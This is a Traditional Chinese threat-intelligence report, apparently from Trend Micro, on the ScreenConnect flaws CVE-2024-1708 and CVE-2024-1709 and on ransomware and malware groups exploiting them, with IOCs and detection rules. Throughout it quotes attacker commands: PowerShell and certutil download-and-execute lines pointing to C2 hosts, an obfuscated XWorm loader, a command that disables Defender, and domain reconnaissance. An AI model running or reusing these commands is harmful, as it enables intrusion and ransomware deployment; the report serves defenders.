漏洞攻擊
包含 Black Basta 在內的駭客集團正在攻擊近期披露的 ScreenConnect 漏洞
本文詳細分析最近的 ScreenConnect 漏洞,同時,也討論我們監測資料發現的一些正在積極攻擊 CVE-2024-1708 和 CVE-2024-1709 漏洞的駭客集團,包括:Black Basta 和 Bl00dy 勒索病毒集團。
2024 年 2 月 19 日,ConnectWise 披露了該公司旗下 ScreenConnect 軟體的重大漏洞 (CVE-2024-1708 和 CVE-2024-1709), 受影響的版本為 23.9.7 與更早的版本。這些資安漏洞可能讓駭客不須經過授權就取得系統的存取與控制權限。
令人擔憂的是,我們已觀察到駭客正利用這些漏洞來散播勒索病毒,導致使用該軟體的企業很可能發生嚴重的營業中斷或損害。為此,ConnectWise 已釋出了緊急安全修正,並呼籲客戶更新到最新的企業內版本來有效防範上述風險。我們也建議趨勢科技客戶參閱我們最新的知識庫文章來取得防護與偵測的指引。
本文詳細分析近期披露的 ScreenConnect 漏洞。同時,也討論我們監測資料發現的一些正在積極攻擊 CVE-2024-1708 和 CVE-2024-1709 漏洞的駭客集團,包括:Black Basta 和 Bl00dy 勒索病毒集團。
CVE-2024-1708 和 CVE-2024-1709 漏洞說明
這些漏洞已經獲得了 CVE 編號,證明它們確實嚴重,需要盡速解決:
1. CVE-2024-1708: 路徑瀏覽漏洞
說明:此漏洞影響的是 ConnectWise ScreenConnect 23.9.7 與更早的版本。它讓駭客無須經過授權就能從管制區外部存取目錄與檔案,進而導致資訊外洩和系統遭到入侵。
嚴重性評分:8.4 (高)
2. CVE-2024-1709: 經由替代路徑或通道迴避認證
說明:ConnectWise ScreenConnect 23.9.7 和更早的版本存在著一個認證迴避漏洞,可能讓駭客直接存取機密資訊或關鍵系統。
嚴重性評分:10.0 (重大)
漏洞分析
本節摘要說明這些漏洞的根源,當兩個漏洞搭配運用時,駭客就有辦法從遠端讓受影響的系統執行任意程式碼。
CVE-2024-1709: 經由替代路徑或通道迴避認證
此漏洞源自於 ScreenConnect.Web.dll 函式庫的 SetupModule 當中的一個路徑問題。更確切地說,就是 onPostMapRequestHandler 這個函式實作 .NET HttpRequest.Path 屬性的方式不正確。
在 .NET 當中,路徑是由 FilePath 和 PathInfo 組合而成。這表示駭客只需在 SetupWizard.aspx HTTP POST 請求末端附加一個 PathInfo 路徑分隔字元來啟動 ScreenConnect 設定程式 (SetupWizard) 就能迴避認證。
CVE-2024-1709 漏洞之所以特別令人擔心,是因為它非常容易攻擊。當駭客成功將未經授權的帳號加入 Connectwise Server 之後,就能利用這些帳號來執行程式碼。
CVE-2024-1708: 路徑瀏覽漏洞
此漏洞源自於 ScreenConnect.Core.dll 函式庫當中的 ScreenConnect.ZipFile.ExtractAllEntries 函式存在的一個問題。 此問題的根源是它並未對使用者提供的路徑執行適當檢查,導致駭客能藉由 ZipSlip 攻擊來瀏覽路徑。
在實際攻擊程序當中,駭客可利用此漏洞來上傳惡意檔案到受害電腦上,例如:網站指令檔 (web shell)。
CVE-2024-1709 和 CVE-2024-1708 漏洞攻擊程序
圖 5 顯示駭客如何利用這兩個漏洞來發動攻擊。
多個駭客集團正在積極利用 ScreenConnect 漏洞發動攻擊
我們的監測資料發現,有各種不同的駭客集團正在利用 ConnectWise ScreenConnect 的漏洞來發動攻擊,包括:散播勒索病毒、竊取資訊、資料外傳等各種不同的活動。而這些活動都來自不同的入侵集合 (intrusion set),顯示這些漏洞亟待解決以確保系統安全。以下將根據我們的觀察來詳細說明目前最普遍的幾種攻擊程序,逐一介紹不同駭客集團的獨特手法。而這也再次證明 ScreenConnect 的使用者應建置有效的防禦策略並盡速修補系統。
Black Basta 勒索病毒集團
目前正在利用這批漏洞的駭客集團之一就是惡名昭彰的 Black Basta 勒索病毒集團。在一些存在著上述漏洞的 ScreenConnect 環境中,我們發現了 Black Basta 相關的 Cobalt Strike 信標。
當駭客首次進入存在漏洞的伺服器時,會先透過下列指令來執行一些偵查、探索及權限提升動作:
對應的 MITRE ID:T1078.003、T1482、T1078.001
- net.exe group "Domain Admins" /domain
用來列出「Domain Admins」這個高權限群組的所有成員,以便找出高價值的目標,方便後續攻擊。
- nltest.exe /domain_trusts /all_trusts
用來列出所有的網域信任關係,這對駭客規劃其橫向移動路徑或跨網域存取資源非常重要。
- net.exe localgroup Administrators Adminis /add
用來新增使用者或群組到本機系統管理員群組。
除此之外,駭客還會植入以下腳本來計算過去 90 天內有多少電腦登入 Active Directory 環境,這很可能是用來找出那些活躍的電腦,當成後續攻擊或內部網路橫向移動的目標:
對應的 MITRE ID:T1087
powershell.exe -c "$D=[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain();$L='LDAP://'.$D;$D = [ADSI]$L;$Date = $((Get-Date).AddDays(-90).ToFileTime());$str = '(&(objectcategory=computer)(|(lastlogon>='+$Date+')(lastlogontimestamp>='+$Date+')))';$s = [adsisearcher]$str;$s.searchRoot = $L.$D.distinguishedName;$s.PageSize = 10000;$s.PropertiesToLoad.Add('cn') > $Null;Foreach ($CA in $s.FindAll()){;$i++;}; Write-Output Total computers: $i"
除此之外,我們也看到環境內被植入下列 Black Basta 相關 Cobalt Strike 惡意檔案:
對應的 MITRE ID:T1059.001
| 指令列 | 惡意檔案 SHA256 雜湊碼 (Cobalt Strike) | Cobalt Strike 幕後操縱 (CC) 伺服器 |
|---|---|---|
| powershell.exe iwr hxxp://207[.[246.74.189:804/download/Diablo.log -outfile C:\Users\Public\Diablo.log rundll32.exe C:\Users\Public\Diablo.log,ExtractFeatures |
11d2dde6c51e977ed6e3f3d3e256c78062ae41fe780aefecfba1627e66daf771 | HTTPS 信標 CC:wipresolutions[.]com |
| powershell.exe iwr hxxp://51[.[195.192.120:804/download/09D.log -outfile C:\Users\Public\09D.log | cc13b5721f2ee6081c1244dd367a9de958353c29e32ea8b66e3b20b293fabc55 | DNS 信標 CC:*.dns.artstrailreviews[.]com |
| powershell.exe iwr hxxp://198[.[244.169.213:8045/download/10443.exe -outfile C:\Users\Public\10443.exe | fa131238c3c35efe99cde59dd409c0436fd642b6bf5d56f994f52ab3a62bae4e | HTTPS 信標 CC:wipresolutions[.]com |
其他集團的 Cobalt Strike 信標
除了 Black Basta 之外,我們也看到其他駭客集團植入的 Cobalt Strike 惡意檔案。在進入受害環境之後,他們會先試圖利用 PowerShell 來關閉 Windows Defender 的即時監控以躲避防禦系統的偵測。
對應的 MITRE ID:T1562
powershell.exe -ep bypass -c "Set-MpPreference -DisableRealtimeMonitoring $true"
接著,他們會利用下列指令來下載 Cobalt Strike 惡意檔案:
對應的 MITRE ID:T1059.001
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://159[.]65[.]130[.]146:4444/a'))"
被下載的 Cobalt Strike 惡意檔案是一個 PowerShell 腳本 (SHA256: e3401d7699cc5067620e43bd24e8ccd437832c16f2fa7d5baaad8c170383cc92),它能與位於:159[.]65[.]130[.]146/activity 的 CC 伺服器通訊來執行更多指令。
截至本文撰稿為止,我們尚不知其下載的最後一個惡意檔案為何 (因為我們無法下載),但根據一些公開資訊來源,我們發現它應該是從以下位置下載:hxxp://159[.]65[.]130[.]146:4444/svchost.exe
Bl00dy 勒索病毒集團
Bl00dy 勒索病毒集團也正積極利用上述 ScreenConnect 漏洞來從事犯罪。該集團最早是在 2022 年 5 月被發現,之前就曾使用過各種零時差漏洞來散播勒索病毒,包括 PaperCut 軟體的 CVE-2023-27350 漏洞。
在其攻擊期間,該集團使用了 Conti 與 LockBit Black (也就是 LockBit 3.0) 所外流的開發套件,但在其勒索訊息當中還是稱他們自己為 Bl00dy 勒索病毒團隊。
我們觀察到 Bl00dy 勒索病毒集團使用下列指令來下載並執行惡意程式:
對應的 MITRE ID:T1105
certutil.exe -urlcache -split -f http://23[.]26[.]137[.]225:8084/msappdata.msi c:\mpyutd.msi
C:\Windows\System32\cmd.exe "/c powershell -command ""curl hxxp://23[.]26[.]137[.]225:8084/msappdata.msi -o c:\mpyuts.msi"""
勒索病毒惡意檔案: 8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600
此勒索病毒惡意檔案會在系統植入一個檔名為「Read_instructions_To_Decrypt.txt」的勒索訊息文件,並且在被加密的檔案末端加上「.CRYPT」副檔名。
C:\Windows\System32\cmd.exe "/c powershell -command ""curl hxxp://23[.]26[.]137[.]225:8091/chromeset.exe -o c:\chromeset.exe"""
勒索病毒惡意檔案: 3a659609850664cbc0683c8c7b92be816254eb9306e7fb12ad79d5a9af0fb623
這是第二個勒索病毒惡意檔案,使用了 LockBit Black 在 2022 年外流的開發套件。被加密的檔案圖示以及受感染電腦的桌面都會被修改成跟 LockBit Black 一樣,只不過勒索訊息還是 Bl00dy 的勒索訊息 (圖 6)。
植入 XWORM 惡意程式的駭客
我們也觀察到有駭客集團利用 ScreenConnect 漏洞來散播 XWorm 惡意程式。XWorm 是一個多功能惡意程式,不僅能為駭客提供遠端存取功能,還能在不同網路之間散播、外傳機敏資料,甚至下載更多惡意檔案。
我們發現,駭客在進入存在漏洞的 ConnectWise 伺服器後,會試圖執行下列 PowerShell 指令來下載並執行 XWORM 惡意程式:
對應的 MITRE ID:T1059.001
powershell.exe -w h -ExecutionPolicy Bypass -Command "(I'w'r('hxxps://paste[.]ee/r/mzeOz/0') -useB) | .('{1}{$}'.replace('$','0')-f'!','I').replace('!','ex');"
powershell.exe -w h -ExecutionPolicy Bypass -Command "(I'w'r('hxxps://paste[.]ee/r/pxLkv/0') -useB) | .('{1}{jaHxp}'.replace('jaHxp','0')-f'!','I').replace('!','ex');"
被下載的檔案當中有一個是 PowerShell 腳本 (SHA256:47d83461ee57031fd2814382fb526937a4cfa9a3eea7a47e4e7ee185c0602b27)。此腳本可在系統植入 XWorm 5.2 版並對外連上其 CC 伺服器 (input-beats[.]gl[.]at[.]ply[.]gg) 來執行其他工作。
植入其他遠端管理工具的駭客
我們還看到有駭客會在系統植入各種不同的遠端管理工具,例如:另一套 ConnectWise、Atera 以及 Syncro。以下是我們觀察到的兩種最普遍的情況:
駭客植入另一個 ScreenConnect 用戶端
我們發現駭客會利用上述漏洞執行下列指令來入侵網域控制器:
對應的 MITRE ID:T1087.003、T1482、T1087.001
net.exe group "domain computers" /domain
nltest.exe /domain_trusts
nltest.exe /dclist:
C:\Windows\System32\net.exe localgroup administrators
接著,他們會利用 BITSAdmin 工具來下載並執行另一個 ScreenConnect 用戶端。
對應的 MITRE ID:T1105
c:\windows\system32\bitsadmin.exe /transfer conhost /download /priority FOREGROUND hxxps://transfer[.]sh/get/HcrhQuN0YC/temp3[.]exe c:\programdata\sc.exe'
ScreenConnect 用戶端 SHA256: 86b5d7dd88b46a3e7c2fb58c01fbeb11dc7ad350370abfe648dbfad45edb8132
ScreenConnect 中繼網址: instance-tj4lui-relay.screenconnect[.]com
駭客使用 Atera RMM 攻擊歐洲地區
我們的監測資料也指出駭客集團如何利用 ScreenConnect 漏洞在歐洲地區的好幾個目標機構 (大多集中在比利時) 植入試用版的 Atera 遠端監控管理 (RMM) 工具。
我們看到由駭客所控制的 ScreenConnect 用戶端會在受害環境當中執行下列指令:
對應的 MITRE ID:T1219
C:\WINDOWS\system32\msiexec.exe /i setup.msi /qn IntegratorLogin=pichet1208@outlook.com CompanyId=1 AccountId=001Q3000007zwkMIAQ
該指令會透過 msiexec 應用程式啟動 Atera RMM 的安裝程序。
結論
有鑑於各式各樣的駭客集團都在利用上述 ConnectWise ScreenConnect 漏洞來發動攻擊,我們強烈建議該軟體的使用者應盡速更新到最新版本。立即修補不僅是對您的良心建議,同時也是您保護系統、對抗上述威脅的必要資安手段。主動管理更新,對於維持強大的網路資安防禦以對抗這類精密攻擊至關重要。趨勢科技客戶可參閱我們的知識庫文章以了解如何利用趨勢科技產品來偵測及矯正漏洞攻擊的後續駭客活動。
這些漏洞一旦被攻擊得逞,很可能將導致機敏資料外洩、營業中斷,甚至是嚴重的財務損失。光憑駭客正在積極利用這些弱點來散播勒索病毒這點,就足以令企業立即採取矯正行動。企業若能隨時掌握最新資安情勢,並迅速採取防範措施,就能有效保護自己免於潛在的資安事件以及相關的後果。
MITRE ATT&CK 技巧
| 手法 | 技巧 | 編號 | 說明 |
|---|---|---|---|
| 突破防線 | 經由漏洞攻擊企業對外的應用程式 | T1190 | 駭客攻擊 ConnectWise 遠端管理工具的漏洞來進入受害環境。 |
| 執行 | PowerShell | T1059.001 | 駭客使用 PowerShell 指令與腳本來執行惡意命令。 |
| 搜尋 | 帳號搜尋 | T1087 | 駭客使用各種工具 (如 nltest.exe 與 net.exe) 從被入侵的環境內部探索其網路基礎架構。 |
| 搜尋 | 網域信任搜尋 | T1482 | 駭客運用這項技巧來蒐集網域信任關係的資訊,尋找橫向移動的機會。 |
| 幕後操縱 | 對內傳輸工具 | T1105 | 駭客使用 BITSAdmin 與 certutil 工具來下載額外的惡意程式。 |
| 幕後操縱 | 遠端存取軟體 | T1219 | 本文中的駭客使用了各種遠端管理軟體,如:Connectwise、Atera 及 Syncro 在受害環境內執行惡意指令。 |
| 躲避防禦 | 降低防禦 | T1562 | 駭客試圖關閉防禦機制,如:Windows Defender。 |
| 資料外傳 | 經由幕後操縱管道將資料外傳 | T1041 | 駭客可能利用現有的幕後操縱 (CC) 管道將偷到的資料外傳。 |
| 衝擊 | 將資料加密造成衝擊 | T1486 | 駭客試圖在受害環境內植入勒索病毒來將資料加密。 |
Trend Vision One 查詢敘述
| 說明 | Trend Vision One 查詢敘述 |
|---|---|
| 偵測經由 ScreenConnect 啟動 nltest.exe 的情況 | eventSubId:2 AND processCmd:ScreenConnect AND objectCmd:nltest |
| 偵測經由 ScreenConnect 與本機系統管理員 (Administrators) 群組互動的情況 | eventSubId:2 AND processCmd:ScreenConnect AND objectCmd:Administrators |
| 偵測經由 ScreenConnect 與網域系統管理員 (Domain Admins) 群組互動的情況 | eventSubId:2 AND processCmd:ScreenConnect AND objectCmd:"Domain Admins" |
| 偵測可疑的 ScreenConnect 呼叫 | eventSubId:2 AND processCmd:ScreenConnect AND objectCmd:("powershell" OR "net" OR "nltest" OR "rundll32" OR "bitsadmin") |
Trend Micro Cloud One - Network Security 與 TippingPoint 過濾規則
- 43908,HTTP: ConnectWise ScreenConnect Authentication Bypass Vulnerability
- 43910,HTTP: ConnectWise ScreenConnect Path Traversal Vulnerability
Trend Vision One Network Sensor 與 Trend Micro Deep Discovery Inspector (DDI) 規則
- 5006: CVE-2024-1708 - ConnectWise ScreenConnect Directory Traversal Exploit - HTTP (Request)
- ·5007: CVE-2024-1709 - ConnectWise ScreenConnect Authentication Bypass Exploit - HTTP (Response)
Trend Vision One Endpoint Security、Trend Cloud One - Workload Security 與 Endpoint Security、Deep Security 以及 Vulnerability Protection IPS 規則
- 1011095 - ConnectWise ScreenConnect Authentication Bypass Vulnerability (CVE-2024-1709)
入侵指標資料
如需本文提到的入侵指標完整清單,請至此處。